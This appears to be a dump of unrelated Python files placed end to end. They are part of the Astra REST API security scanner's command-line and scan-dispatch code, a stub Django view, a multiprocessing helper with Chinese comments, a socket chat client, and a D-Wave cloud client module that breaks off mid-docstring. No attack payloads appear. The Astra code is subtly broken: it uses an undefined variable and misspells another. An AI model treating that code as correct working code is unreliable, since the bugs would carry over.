''' This function deals with scanning a single API. '''
if headers is None or headers == '':
headers = {'Content-Type' : 'application/json'}
try:
# Convert header and body in dict format
if type(headers) is not dict:
headers = ast.literal_eval(headers)
if body:
if type(body) is not dict:
body = ast.literal_eval(body)
except:
return False
if method == '':
method = 'GET'
result = validate_data(url, method)
if result is False:
print "[-]Invalid Arguments"
return False
p = Process(target=modules_scan,args=(url,method,headers,body,scanid),name='module-scan')
p.start()
if api == "Y":
return True
def scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require):
''' Scan API through different engines '''
scanid = ''
if collection_type and collection_name is not None:
parse_collection(collection_name,collection_type)
if login_require is True:
api_login.verify_login(parse_data.api_lst)
msg = True
for data in parse_data.api_lst:
try:
url = data['url']['raw']
except:
url = data['url']
headers,method,body = data['headers'],data['method'],''
if headers:
try:
headhers = add_headers(headers)
except:
pass
if data['body'] != '':
body = json.loads(base64.b64decode(data['body']))
modules_scan(url,method,headers,body,scanid)
else:
print "%s [-]Invalid Collection. Please recheck collection Type/Name %s" %(api_logger.G, api_logger.W)
#generate_report()
def get_arg(args=None):
parser = argparse.ArgumentParser(description='Astra - REST API Security testing Framework')
parser.add_argument('-c', '--collection_type',
help='Type of API collection',
default='Postman')
parser.add_argument('-n', '--collection_name',
help='Type of API collection')
parser.add_argument('-u', '--url',
help='URL of target API')
parser.add_argument('-headers', '--headers',
help='Custom headers.Example: {"token" : "123"}')
parser.add_argument('-method', '--method',
help='HTTP request method',
default='GET',choices=('GET', 'POST', 'PUT','DELETE'))
parser.add_argument('-b', '--body',
help='Request body of API')
parser.add_argument('-l', '--loginurl',
help='URL of login API')
parser.add_argument('-H', '--loginheaders',
help='Headers should be in a dictionary format. Example: {"accesstoken" : "axzvbqdadf"}')
parser.add_argument('-d', '--logindata',
help='login data of API')
results = parser.parse_args(args)
if len(args) == 0:
print "%sAt least one argument is needed to procced.\nFor further information check help: %spython astra.py --help%s"% (api_logger.R, api_logger.G, api_logger.W)
sys.exit(1)
return (results.collection_type,
results.collection_name,
results.url,
results.headers,
results.method,
results.body,
results.loginurl,
results.loginheaders,
results.logindata,
)
def main():
collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata = get_arg(sys.argv[1:])
if loginheaders is None:
loginheaders = {'Content-Type' : 'application/json'}
if collection_type and collection_name and loginurl and loginmethod and logindata:
# Login data is given as an input.
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif collection_type and collection_name and loginurl:
# This will first find the given loginurl from collection and it will fetch auth token.
parse_collection(collection_name,collection_type)
try:
loginurl,lognheaders,loginmethod,logidata = api_login.parse_logindata(loginurl)
except:
print "[-]%s Failed to detect login API from collection %s " %(api_logger.R, api_logger.W)
sys.exit(1)
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif loginurl and loginmethod:
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif collection_type and collection_name and headers:
#Custom headers
update_value('login','header',headers)
login_require = False
elif url and collection_name and headers:
#Custom headers
update_value('login','header',headers)
login_require = False
elif url:
if headers is None:
headers = {'Content-Type' : 'application/json'}
if method is None:
method = "GET"
login_require = False
else:
login_require = True
if body:
body = ast.literal_eval(body)
# Configuring ZAP before starting a scan
get_auth = get_value('config.property','login','auth_type')
if collection_type and collection_name is not None:
scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require)
else:
scan_single_api(url, method, headers, body, "False")
if __name__ == '__main__':
api_login = APILogin()
parse_data = PostmanParser()
api_logger = logger()
api_logger.banner()
main() |
views.py | from django.shortcuts import render
from django.http import HttpResponse
import os
import time
import threading
#def detached(argc, argv):
def show(request):
#argc = 22
#argv = 10
#t = threading.Thread(target = detached, args = (argc, argv))
#t.daemon = True
#t.start()
return render(request, 'notepad/index.html')
|
mp.py | # coding: utf8
"""
并行计算模块
原理:
并行版本的实现说明:
1 标准生产者\消费者模型
2 生产者处于线程中, 将任务迭代器的内容写入任务队列中,并置结束标志
3 消费者多个进程, 读取task_queue的内容, 并返回result到done_queue中
4 主线程监控done_queue的内容, 并插入数据库(保持gInst的事务), 直到整个任务结束
"""
from multiprocessing import Process, Queue, current_process, cpu_count
import threading
import traceback
#from shangjie.utils import traceback2
def mp_start( n , iter , callback ):
"""
多进程API
参数:
n 创建几个进程,当为0时,自动探测cpu个数,并创建N-1个
iter 任务迭代器,可以直接迭代的对象。
list,tuple或含有yield的函数
每次迭代返回的内容应该为( func , args , kwargs )
* 注:
func函数必须为模块级函数,否则在子进程中无法正常调用
且func函数第一个参数为idx(子进程序号)
callback 回调函数,每个任务函数返回值的处理。
开发人员应该根据任务函数定义。
当为空时,系统不处理回调。
回调函数的参数为:
子进程序号,函数返回结果
返回值:
无
用法:
在主线程中调用该函数,该函数调用前,需准备好任务迭代器和回调函数。
该函数会阻塞,直到所有任务完成。
"""
# 确定子进程个数
if n == 0:
n = cpu_count() - 1
if n == 0:
n = 1
# 初始化工作队列和结果队列
task_queue = Queue()
done_queue = Queue()
# 先启动消费者待命
subs = []
for i in range(n):
p = Process( target=worker, args=( i , task_queue , done_queue ) )
subs.append( p )
p.daemon = False
p.start()
try:
# 启动生产者线程
import threading
t = threading.Thread( target = publisher , args= ( n , iter , task_queue ) ).start()
stops = 0
ex = False
while stops < n:
result = done_queue.get()
if result == 'STOP':
stops += 1
elif type( result ) is tuple and result[0] == 'EXCEPT':
stops += 1
ex = result[1]
elif result and callable( callback ):
callback( *result )
if ex:
raise RuntimeError( "并行处理时,子进程发生异常:\n%s" % ex )
finally:
# 清理所有子进程
for p in subs:
p.join()
def publisher( n , iter , task_queue ):
"""
使用线程处理任务发生的原因是有可能iter是一个yield函数迭代器,内容可能会非常多。
"""
try:
for obj in iter:
if type( obj ) is not tuple:
raise RuntimeError( '任务迭代器应该返回元组对象[%r]' % obj )
if len( obj ) != 3:
raise RuntimeError( '任务迭代器应该返回三元素元组对象[%r]' % obj )
if not callable( obj[0] ):
raise RuntimeError( '任务的第一元素应该为可执行对象[%r]' % obj[0] )
if type( obj[1] ) is not tuple:
raise RuntimeError( '任务的第二元素应该为tuple[%r]' % obj[1] )
if type( obj[2] ) is not dict:
raise RuntimeError( '任务的第三元素应该为dict[%r]' % obj[2] )
task_queue.put( obj )
except:
traceback.format_exc( )
for i in range( n ):
task_queue.put( 'STOP' ) # 发送给子进程结束信号
def worker( idx , task_queue , done_queue ):
try:
for func , args , kwargs in iter(task_queue.get, 'STOP'):
result = func( idx , *args , **kwargs )
done_queue.put( ( idx , result ) )
done_queue.put( 'STOP' )
except:
ex = traceback.format_exc( )
done_queue.put( ( 'EXCEPT' , ex ) )
finally:
import sys
sys.exit(0)
# for test
# 由于sum函数需要在子进程中执行,因此,必须将其配置为模块级的
import time
def sum( idx , a , b ):
r = 0
if a == 5:
raise RuntimeError( 'haha' )
for i in range( 10 ):
time.sleep( 0.1 )
r += i
return a
if __name__ == '__main__':
# 测试
def itt():
for i in range( 10 ):
yield ( sum , ( i , i * 10 ) , {} )
def cb( idx , x ):
print 'p' , idx , 'done' , x , time.time()
import time
t = time.time()
print t
mp_start( 5 , itt() , cb )
print time.time() - t |
client.py | import socket
import threading
class Client:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
userName = input("Username: ")
def sendMsg(self):
while True:
self.server.send(bytes(f"[{self.userName}] " + input(""), 'utf-8'))
def __init__(self, ip, port):
self.server.connect((ip, port))
iThread = threading.Thread(target=self.sendMsg)
iThread.daemon = True
iThread.start()
while True:
data = self.server.recv(2048)
if not data:
break
print(str(data, 'utf-8'))
client = Client(input('Ip: '), int(input('Port: '))) |
base.py | # Copyright 2017 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
D-Wave API clients handle communications with :term:`solver` resources: problem submittal,
monitoring, samples retrieval, etc.
Examples:
This example creates a client using the local system's default D-Wave Cloud Client
configuration file, which is configured to access a D-Wave 2000Q QPU, submits
a :term:`QUBO` problem (a Boolean NOT gate represented by a penalty model), and
samples 5 times.
>>> from dwave.cloud import Client
>>> Q = {(0, 0): -1, (0, 4): 0, (4, 0): 2, (4, 4): -1}
>>> with Client.from_config() as client: # doctest: +SKIP
... solver = client.get_solver()
... computation = solver.sample_qubo(Q, num_reads=5)
...
>>> for i in range(5): # doctest: +SKIP
... print(computation.samples[i][0], computation.samples[i][4])
...
(1, 0)
(1, 0)
(0, 1)
(0, 1)
(0, 1)
"""
import re
import sys
import time
import json
import copy
import queue
import logging
import inspect
import warnings
import operator
import threading
import base64
import hashlib
import codecs
import concurrent.futures
from itertools import chain, zip_longest
from functools import partial, wraps, lru_cache
from collections import abc, namedtuple, OrderedDict
from concurrent.futures import ThreadPoolExecutor
from typing import Optional, Tuple, Dict
import requests
import urllib3
from dateutil.parser import parse as parse_datetime
from plucky import pluck
from dwave.cloud import api
from dwave.cloud.package_info import __packagename__, __version__
from dwave.cloud.exceptions import * # TODO: fix
from dwave.cloud.computation import Future
from dwave.cloud.config import (
load_config, parse_float, parse_int, parse_boolean, update_config)
from dwave.cloud.solver import Solver, available_solvers
from dwave.cloud.concurrency import PriorityThreadPoolExecutor
from dwave.cloud.upload import ChunkedData
from dwave.cloud.events import dispatches_events
from dwave.cloud.utils import (
TimeoutingHTTPAdapter, BaseUrlSession, user_agent,
datetime_to_timestamp, utcnow, epochnow, cached, retried, is_caused_by)
__all__ = ['Client']
logger = logging.getLogger(__name__)
class Client(object):
"""Base client class for all D-Wave API clients. Used by QPU, software and
hybrid :term:`sampler` classes.
Manages workers and handles thread pools for submitting problems, cancelling
tasks, polling problem status, and retrieving results.
Args:
region (str, optional, default='na-west-1'):
D-Wave Solver API region. To see available regions use
:meth:`.Client.get_regions`.
endpoint (str, optional):
D-Wave Solver API endpoint URL. If undefined, inferred from
``region`` code.
token (str):
Authentication token for the D-Wave API.
solver (dict/str, optional):
Default solver features (or simply solver name) to use in
:meth:`.Client.get_solver`.
Defined via dictionary of solver feature constraints
(see :meth:`.Client.get_solvers`).
For backward compatibility, a solver name, as a string, is also
accepted and converted to ``{"name": <solver name>}``.
proxy (str, optional):
Proxy URL to be used for accessing the D-Wave API.
permissive_ssl (bool, default=False):
Disables SSL verification.
request_timeout (float, default=60):
Connect and read timeout, in seconds, for all requests to the
D-Wave API.
polling_timeout (float, optional):
Problem status polling timeout, in seconds, after which polling is
aborted.
connection_close (bool, default=False):
Force HTTP(S) connection close after each request. Set to ``True``
to prevent intermediate network equipment closing idle connections.
headers (dict/str, optional):
Newline-separated additional HTTP headers to include with each
API request, or a dictionary of (key, value) pairs.
client_cert (str, optional):
Path to client side certificate file.
client_cert_key (str, optional):
Path to client side certificate key file.
poll_backoff_min (float, default=0.05):
Problem status is polled with exponential back-off schedule.
Duration of the first interval (between first and second poll) is
set to ``poll_backoff_min`` seconds.
poll_backoff_max (float, default=60):
Problem status is polled with exponential back-off schedule.
Maximum back-off period is limited to ``poll_backoff_max`` seconds.
http_retry_total (int, default=10):
Total number of retries of failing idempotent HTTP requests to
allow. Takes precedence over other counts.
See ``total`` in :class:`~urllib3.util.retry.Retry` for details.
http_retry_connect (int, default=None):
How many connection-related errors to retry on.
See ``connect`` in :class:`~urllib3.util.retry.Retry` for details.
http_retry_read (int, default=None):
How many times to retry on read errors.
See ``read`` in :class:`~urllib3.util.retry.Retry` for details.
http_retry_redirect (int, default=None):
How many redirects to perform.
See ``redirect`` in :class:`~urllib3.util.retry.Retry` for details.
http_retry_status (int, default=None):
How many times to retry on bad status codes.
See ``status`` in :class:`~urllib3.util.retry.Retry` for details.
http_retry_backoff_factor (float, default=0.01):
A backoff factor to apply between attempts after the second try.
Sleep between retries, in seconds::
{backoff factor} * (2 ** ({number of total retries} - 1))
See ``backoff_factor`` in :class:`~urllib3.util.retry.Retry` for
details.
http_retry_backoff_max (float, default=60):
Maximum backoff time in seconds.
See :attr:`~urllib3.util.retry.Retry.BACKOFF_MAX` for details.
metadata_api_endpoint (str, optional):
D-Wave Metadata API endpoint. Central for all regions, used for
regional SAPI endpoint discovery.
defaults (dict, optional):
Defaults for the client instance that override the class
:attr:`.Client.DEFAULTS`.
Note:
Default values of all constructor arguments listed above are kept in
a class variable :attr:`.Client.DEFAULTS`.
Instance-level defaults can be specified via ``defaults`` argument.
Examples:
This example directly initializes a :class:`.Client`.
Direct initialization uses class constructor arguments, the minimum
being a value for ``token``.
>>> from dwave.cloud import Client
>>> client = Client(token='secret') # doctest: +SKIP
>>> # code that uses client
>>> client.close() # doctest: +SKIP
"""
# The status flags that a problem can have
STATUS_IN_PROGRESS = 'IN_PROGRESS'
STATUS_PENDING = 'PENDING'
STATUS_COMPLETE = 'COMPLETED'
STATUS_FAILED = 'FAILED'
STATUS_CANCELLED = 'CANCELLED'
# Cases when multiple status flags qualify
ANY_STATUS_ONGOING = [STATUS_IN_PROGRESS, STATUS_PENDING]
ANY_STATUS_NO_RESULT = [STATUS_FAILED, STATUS_CANCELLED]
# Default API endpoint
# TODO: remove when refactored to use `dwave.cloud.api`?
DEFAULT_API_ENDPOINT = api.constants.DEFAULT_SOLVER_API_ENDPOINT
DEFAULT_API_REGION = api.constants.DEFAULT_REGION
# Class-level defaults for all constructor and factory arguments
DEFAULTS = {
# factory only
'config_file': None,
'profile': None,
'client': 'base',
# constructor (and factory)
'metadata_api_endpoint': api.constants.DEFAULT_METADATA_API_ENDPOINT,
'region': DEFAULT_API_REGION,
# NOTE: should we rename endpoint to solver_api_endpoint for clarity?
'endpoint': None, # defined via region, resolved on client init
'token': None,
'solver': None,
'proxy': None,
'permissive_ssl': False,
'request_timeout': 60,
'polling_timeout': None,
'connection_close': False,
'headers': None,
'client_cert': None,
'client_cert_key': None,
# poll back-off schedule defaults [sec]
'poll_backoff_min': 0.05,
'poll_backoff_max': 60,
# idempotent http requests retry params
'http_retry_total': 10,
'http_retry_connect': None,
'http_retry_read': None,
'http_retry_redirect': None,
'http_retry_status': None,
'http_retry_backoff_factor': 0.01,
'http_retry_backoff_max': 60,
}
# Number of problems to include in a submit/status query
_SUBMIT_BATCH_SIZE = 20
_STATUS_QUERY_SIZE = 100
# Number of worker threads for each problem processing task
_SUBMISSION_THREAD_COUNT = 5
_UPLOAD_PROBLEM_THREAD_COUNT = 1
_UPLOAD_PART_THREAD_COUNT = 10
_ENCODE_PROBLEM_THREAD_COUNT = _UPLOAD_PROBLEM_THREAD_COUNT
_CANCEL_THREAD_COUNT = 1
_POLL_THREAD_COUNT = 2
_LOAD_THREAD_COUNT = 5
# Poll grouping time frame; two scheduled polls are grouped if closer than [sec]:
_POLL_GROUP_TIMEFRAME = 2
# Downloaded solver definition cache maxage [sec]
_SOLVERS_CACHE_MAXAGE = 300 # 5 min
# Downloaded region metadata cache maxage [sec]
_REGIONS_CACHE_MAXAGE = 86400 # 1 day
# Multipart upload parameters
_UPLOAD_PART_SIZE_BYTES = 5 * 1024 * 1024
_UPLOAD_PART_RETRIES = 2
_UPLOAD_REQUEST_RETRIES = 2
_UPLOAD_RETRIES_BACKOFF = lambda retry: 2 ** retry
@classmethod
def from_config(cls, config_file=None, profile=None, client=None, **kwargs):
"""Client factory method to instantiate a client instance from configuration.
Configuration values can be specified in multiple ways, ranked in the following
order (with 1 the highest ranked):
1. Values specified as keyword arguments in :func:`from_config()`
2. Values specified as environment variables
3. Values specified in the configuration file
4. Values specified as :class:`.Client` instance defaults
5. Values specified in :class:`.Client` class :attr:`.Client.DEFAULTS`
Configuration-file format and environment variables are described in
:mod:`dwave.cloud.config`.
File/environment configuration loading mechanism is described in
:func:`~dwave.cloud.config.load_config`.
Args:
config_file (str/[str]/None/False/True, default=None):
Path to configuration file. For interpretation, see
:func:`~dwave.cloud.config.load_config`.
profile (str, default=None):
Profile name. For interpretation, see
:func:`~dwave.cloud.config.load_config`.
client (str, default=None):
Client type used for accessing the API. Supported values are
``qpu`` for :class:`dwave.cloud.qpu.Client`,
``sw`` for :class:`dwave.cloud.sw.Client` and
``hybrid`` for :class:`dwave.cloud.hybrid.Client`.
**kwargs (dict):
:class:`.Client` constructor options.
Returns:
:class:`~dwave.cloud.client.Client` subclass:
Appropriate instance of a QPU/software/hybrid client.
Raises:
:exc:`~dwave.cloud.exceptions.ConfigFileReadError`:
Config file specified or detected could not be opened or read.
:exc:`~dwave.cloud.exceptions.ConfigFileParseError`:
Config file parse failed.
:exc:`ValueError`:
Invalid (non-existing) profile name.
"""
# load configuration from config file(s) and environment
config = load_config(config_file=config_file, profile=profile,
client=client, **kwargs)
logger.debug("Config loaded: %r", config)
from dwave.cloud.client import qpu, sw, hybrid
_clients = {
'base': cls,
'qpu': qpu.Client,
'sw': sw.Client,
'hybrid': hybrid.Client,
}
_client = config.pop('client', None) or 'base'
logger.debug("Creating %s.Client() with: %r", _client, config)
return _clients[_client](**config)
def _resolve_region_endpoint(self, *,
region: Optional[str] = None,
endpoint: Optional[str] = None) -> Tuple[str, str]:
"""For a region/endpoint pair from config, return the Solver API
endpoint to use (and the matching region).
Explicit endpoint will override the region (i.e. region extension is
backwards-compatible).
Regional endpoint is fetched from Metadata API. If Metadata API is not
available, default global endpoint is used.
"""
if endpoint:
return (region, endpoint)
if not region:
return (self.DEFAULT_API_REGION, self.DEFAULT_API_ENDPOINT)
try:
regions = self.get_regions()
except (api.exceptions.RequestError, ValueError) as exc:
logger.warning("Failed to fetch available regions: %r. "
"Using the default Solver API endpoint.", exc)
return (self.DEFAULT_API_REGION, self.DEFAULT_API_ENDPOINT)
if region not in regions:
raise ValueError(f"Region {region!r} unknown. "
f"Try one of {list(regions.keys())!r}.")
return (region, regions[region]['endpoint'])
@dispatches_events('client_init')
def __init__(self, endpoint=None, token=None, solver=None, **kwargs):
# for (reasonable) backwards compatibility, accept only the first few
# positional args.
# TODO: deprecate the use of positional args
if endpoint is not None:
kwargs.setdefault('endpoint', endpoint)
if token is not None:
kwargs.setdefault('token', token)
if solver is not None:
kwargs.setdefault('solver', solver)
logger.debug("Client init called with: %r", kwargs)
# derive instance-level defaults from class defaults and init defaults
self.defaults = copy.deepcopy(self.DEFAULTS)
user_defaults = kwargs.pop('defaults', None)
if user_defaults is None:
user_defaults = {}
update_config(self.defaults, user_defaults)
# combine instance-level defaults with file/env/kwarg option values
# note: treat empty string values (e.g. from file/env) as undefined/None
options = copy.deepcopy(self.defaults)
update_config(options, kwargs)
logger.debug("Client options with defaults: %r", options)
# configure MetadataAPI access -- needed by Client.get_regions()
self.metadata_api_endpoint = options['metadata_api_endpoint']
# parse headers as they might be needed by Client.get_regions()
headers = options['headers']
if not headers:
headers_dict = {}
elif isinstance(headers, abc.Mapping):
headers_dict = headers
elif isinstance(headers, str):
try:
# valid headers = "Field-1: value-1\nField-2: value-2"
headers_dict = {key.strip(): val.strip()
for key, val in [line.split(':')
for line in headers.strip().split('\n')]}
except Exception as e:
logger.debug("Invalid headers: %r", headers)
headers_dict = {}
else:
raise ValueError("HTTP headers expected in a dict, or a string")
logger.debug("Parsed headers=%r", headers_dict)
self.headers = headers_dict
# resolve endpoint using region
region, endpoint = self._resolve_region_endpoint(
region=options.get('region'), endpoint=options.get('endpoint'))
# sanity check
if not endpoint:
raise ValueError("API endpoint not defined")
token = options['token']
if not token:
raise ValueError("API token not defined")
# parse optional client certificate
client_cert = options['client_cert']
client_cert_key = options['client_cert_key']
if client_cert_key is not None:
if client_cert is not None:
client_cert = (client_cert, client_cert_key)
else:
raise ValueError(
"Client certificate key given, but the cert is missing")
# parse solver
solver = options['solver']
if not solver:
solver_def = {}
elif isinstance(solver, abc.Mapping):
solver_def = solver
elif isinstance(solver, str):
# support features dict encoded as JSON in our config INI file
# TODO: push this decoding to the config module, once we switch to a
# richer config format (JSON or YAML)
try:
solver_def = json.loads(solver)
except Exception:
# unparseable json, assume string name for solver
# we'll deprecate this eventually, but for now just convert it to
# features dict (equality constraint on full solver name)
logger.debug("Invalid solver JSON, assuming string name: %r", solver)
solver_def = dict(name__eq=solver)
else:
raise ValueError("Expecting a features dictionary or a string name for 'solver'")
logger.debug("Parsed solver=%r", solver_def)
# Store connection/session parameters
# TODO: consolidate all options under Client.options or similar
self.region = region # for record only
self.endpoint = endpoint
self.token = token
self.default_solver = solver_def
self.client_cert = client_cert
self.request_timeout = parse_float(options['request_timeout'])
self.polling_timeout = parse_float(options['polling_timeout'])
self.proxy = options['proxy']
self.permissive_ssl = parse_boolean(options['permissive_ssl'])
self.connection_close = parse_boolean(options['connection_close'])
self.poll_backoff_min = parse_float(options['poll_backoff_min'])
self.poll_backoff_max = parse_float(options['poll_backoff_max'])
self.http_retry_total = parse_int(options['http_retry_total'])
self.http_retry_connect = parse_int(options['http_retry_connect'])
self.http_retry_read = parse_int(options['http_retry_read'])
self.http_retry_redirect = parse_int(options['http_retry_redirect'])
self.http_retry_status = parse_int(options['http_retry_status'])
self.http_retry_backoff_factor = parse_float(options['http_retry_backoff_factor'])
self.http_retry_backoff_max = parse_float(options['http_retry_backoff_max'])
opts = (
'region', 'endpoint', 'token', 'default_solver',
'client_cert', 'request_timeout', 'polling_timeout',
'proxy', 'headers', 'permissive_ssl', 'connection_close',
'poll_backoff_min', 'poll_backoff_max',
'http_retry_total', 'http_retry_connect', 'http_retry_read',
'http_retry_redirect', 'http_retry_status',
'http_retry_backoff_factor', 'http_retry_backoff_max')
logger.debug(
"Client initialized with (%s)",
", ".join("{}={!r}".format(o, getattr(self, o)) for o in opts))
# Create session for main thread only
self.session = self.create_session()
# Build the problem submission queue, start its workers
self._submission_queue = queue.Queue()
self._submission_workers = []
for _ in range(self._SUBMISSION_THREAD_COUNT):
worker = threading.Thread(target=self._do_submit_problems)
worker.daemon = True
worker.start()
self._submission_workers.append(worker)
# Build the cancel problem queue, start its workers
self._cancel_queue = queue.Queue()
self._cancel_workers = []
for _ in range(self._CANCEL_THREAD_COUNT):
worker = threading.Thread(target=self._do_cancel_problems)
worker.daemon = True
worker.start()
self._cancel_workers.append(worker)
# Build the problem status polling queue, start its workers
self._poll_queue = queue.PriorityQueue()
self._poll_workers = []
for _ in range(self._POLL_THREAD_COUNT):
worker = threading.Thread(target=self._do_poll_problems)
worker.daemon = True
worker.start()
self._poll_workers.append(worker)
# Build the result loading queue, start its workers
self._load_queue = queue.Queue()
self._load_workers = []
for _ in range(self._LOAD_THREAD_COUNT):
worker = threading.Thread(target=self._do_load_results)
worker.daemon = True
worker.start()
self._load_workers.append(worker)
# Setup multipart upload executors
self._upload_problem_executor = \
ThreadPoolExecutor(self._UPLOAD_PROBLEM_THREAD_COUNT)
self._upload_part_executor = \
PriorityThreadPoolExecutor(self._UPLOAD_PART_THREAD_COUNT)
self._encode_problem_executor = \
ThreadPoolExecutor(self._ENCODE_PROBLEM_THREAD_COUNT)
# note: @cached_property available only in py38+
@property
@lru_cache(maxsize=None)
def _user_agent(self):
"""User-Agent string for this client instance, as returned by
:meth:`~dwave.cloud.utils.user_agent`, computed on first access and
cached for the lifespan of the client.
Note:
The only tags that might change are platform tags, as returned by
``dwave.common.platform.tags`` entry points, and `platform.platform()`
(like linux kernel version). Assuming OS/machine won't change during
client's lifespan, and typical platform tags defined via entry points
depend on process environments (which rarely change), it's pretty safe
to always use the per-instance cached user agent.
"""
return user_agent(__packagename__, __version__)
def create_session(self):
"""Create a new requests session based on client's (self) params.
Note: since `requests.Session` is NOT thread-safe, every thread should
create and use an isolated session.
"""
# allow endpoint path to not end with /
endpoint = self.endpoint
if not endpoint.endswith('/'):
endpoint += '/'
# create http idempotent Retry config
def get_retry_conf():
# need a subclass to override the backoff_max
class Retry(urllib3.Retry):
BACKOFF_MAX = self.http_retry_backoff_max
return Retry(
total=self.http_retry_total,
connect=self.http_retry_connect,
read=self.http_retry_read,
redirect=self.http_retry_redirect,
status=self.http_retry_status,
backoff_factor=self.http_retry_backoff_factor,
raise_on_redirect=True,
raise_on_status=True,
respect_retry_after_header=True)
session = BaseUrlSession(base_url=endpoint)
session.mount('http://',
TimeoutingHTTPAdapter(timeout=self.request_timeout,
max_retries=get_retry_conf()))
session.mount('https://',
TimeoutingHTTPAdapter(timeout=self.request_timeout,
max_retries=get_retry_conf()))
session.headers.update({'User-Agent': self._user_agent})
if self.headers:
session.headers.update(self.headers)
if self.token:
session.headers.update({'X-Auth-Token': self.token})
if self.client_cert:
session.cert = self.client_cert
session.proxies = {'http': self.proxy, 'https': self.proxy}
if self.permissive_ssl:
session.verify = False
if self.connection_close:
session.headers.update({'Connection': 'close'})
# Debug-log headers
logger.trace("create_session(session.headers=%r)", session.headers)
return session
def close(self):
"""Perform a clean shutdown.
Waits for all the currently scheduled work to finish, kills the workers,
and closes the connection pool.
.. note:: Ensure your code does not submit new work while the connection is closing.
Where possible, it is recommended you use a context manager (a :code:`with Client.from_config(...) as`
construct) to ensure your code properly closes all resources.
Examples:
This example creates a client (based on an auto-detected configuration file), executes
some code (represented by a placeholder comment), and then closes the client.
>>> from dwave.cloud import Client
>>> client = Client.from_config() # doctest: +SKIP
>>> # code that uses client
>>> client.close() # doctest: +SKIP
"""
# Finish all the work that requires the connection
logger.debug("Joining submission queue")
self._submission_queue.join()
logger.debug("Joining cancel queue")
self._cancel_queue.join()
logger.debug("Joining poll queue")
self._poll_queue.join()
logger.debug("Joining load queue")
self._load_queue.join()
logger.debug("Shutting down problem upload executor")
self._upload_problem_executor.shutdown()
logger.debug("Shutting down problem part upload executor")
self._upload_part_executor.shutdown()
logger.debug("Shutting down problem encoder executor")
self._encode_problem_executor.shutdown()
# Send kill-task to all worker threads
# Note: threads can't be 'killed' in Python, they have to die by
# natural causes
for _ in self._submission_workers:
self._submission_queue.put(None)
for _ in self._cancel_workers:
self._cancel_queue.put(None)
for _ in self._poll_workers:
self._poll_queue.put((-1, None))
for _ in self._load_workers:
self._load_queue.put(None)
# Wait for threads to die
for worker in chain(self._submission_workers, self._cancel_workers,
self._poll_workers, self._load_workers):
worker.join()
# Close the main thread's session
self.session.close()
def __enter__(self):
"""Let connections be used in with blocks."""
return self
def __exit__(self, *args):
"""At the end of a with block perform a clean shutdown of the connection."""
self.close()
return False
@staticmethod
def is_solver_handled(solver):
"""Determine if the specified solver should be handled by this client.
Default implementation accepts all solvers (always returns True). Override this
predicate function with a subclass if you want to specialize your client for a
particular type of solvers.
Examples:
This function accepts only solvers named "My_Solver_*".
.. code:: python
@staticmethod
def is_solver_handled(solver):
return solver and solver.id.startswith('My_Solver_')
"""
return True
@staticmethod
@cached.ondisk(maxage=_REGIONS_CACHE_MAXAGE)
def _fetch_available_regions(metadata_api_endpoint, **config):
logger.info("Fetching available regions from the Metadata API at %r",
metadata_api_endpoint)
with api.Regions(endpoint=metadata_api_endpoint, **config) as regions:
data = regions.list_regions()
logger.debug("Received region metadata: %r", data)
return data
def get_regions(self, refresh: bool = False) -> Dict[str, Dict[str, str]]:
"""Retrieve available API regions.
Args:
refresh:
Force cache refresh.
Returns:
Mapping of region details (name and endpoint) over region codes.
"""
try:
rs = Client._fetch_available_regions(
metadata_api_endpoint=self.metadata_api_endpoint,
headers=self.headers,
refresh_=refresh)
except api.exceptions.RequestError as exc:
logger.debug("Metadata API unavailable", exc_info=True)
raise ValueError(
f"Metadata API unavailable at {self.metadata_api_endpoint!r}")
logger.info("Using region metadata: %r", rs)
return {r.code: {"name": r.name, "endpoint": r.endpoint} for r in rs}
@cached(maxage=_SOLVERS_CACHE_MAXAGE)
def _fetch_solvers(self, name=None):
if name is not None:
logger.info("Fetching definition of a solver with name=%r", name)
url = 'solvers/remote/{}/'.format(name)
else:
logger.info("Fetching definitions of all available solvers")
url = 'solvers/remote/'
try:
data = Client._sapi_request(self.session.get, url)
except SAPIError as exc:
if name is not None and exc.error_code == 404:
raise SolverNotFoundError("No solver with name={!r} available".format(name))
else:
raise
if name is not None:
data = [data]
logger.info("Received solver data for %d solver(s).", len(data))
logger.trace("Solver data received for solver name=%r: %r", name, data)
solvers = []
for solver_desc in data:
for solver_class in available_solvers:
try:
logger.debug("Trying to instantiate %r", solver_class.__name__)
solver = solver_class(self, solver_desc)
if self.is_solver_handled(solver):
solvers.append(solver)
logger.info("Adding solver %r", solver)
break
else:
logger.debug("Skipping solver %r (not handled by this client)", solver)
except UnsupportedSolverError as e:
logger.debug("Skipping solver due to %r", e)
# propagate all other/decoding errors, like InvalidAPIResponseError, etc.
return solvers
def retrieve_answer(self, id_):
"""Retrieve a problem by id.
Args:
id_ (str):
As returned by :attr:`Future.id`.
Returns:
:class:`Future`
"""
future = Future(None, id_)
self._load(future)
return future
@dispatches_events('get_solvers')
def get_solvers(self, refresh=False, order_by='avg_load', **filters):
"""Return a filtered list of solvers handled by this client.
Args:
refresh (bool, default=False):
Force refresh of cached list of solvers/properties.
order_by (callable/str/None, default='avg_load'):
Solver sorting key function (or :class:`~dwave.cloud.solver.Solver`
attribute/item dot-separated path). By default, solvers are sorted
by average load. To explicitly not sort the solvers (and use the
API-returned order), set ``order_by=None``.
Signature of the `key` `callable` is::
key :: (Solver s, Ord k) => s -> k
Basic structure of the `key` string path is::
"-"? (attr|item) ( "." (attr|item) )*
For example, to use solver property named ``max_anneal_schedule_points``,
available in ``Solver.properties`` dict, you can either specify a
callable `key`::
key=lambda solver: solver.properties['max_anneal_schedule_points']
or, you can use a short string path based key::
key='properties.max_anneal_schedule_points'
Solver derived properties, available as :class:`Solver` properties
can also be used (e.g. ``num_active_qubits``, ``online``,
